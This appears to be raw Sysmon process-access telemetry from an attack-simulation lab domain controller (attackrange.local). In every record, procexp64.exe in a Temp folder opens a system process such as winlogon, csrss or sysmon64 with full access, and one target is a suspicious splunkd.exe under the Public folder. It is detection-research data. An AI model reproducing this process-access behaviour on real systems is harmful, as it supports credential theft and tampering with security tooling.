15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787914Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787913Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787912Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787911Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787910Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787909Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787908Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787907Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787906Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787905Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787904Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787903Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787902Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787901Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787900Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787899Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787898Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787897Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787896Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787895Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787894Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787893Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787892Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787891Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787890Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787889Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787888Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787887Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787886Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787885Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787884Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787883Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787882Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787881Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787880Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787879Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787878Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787877Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 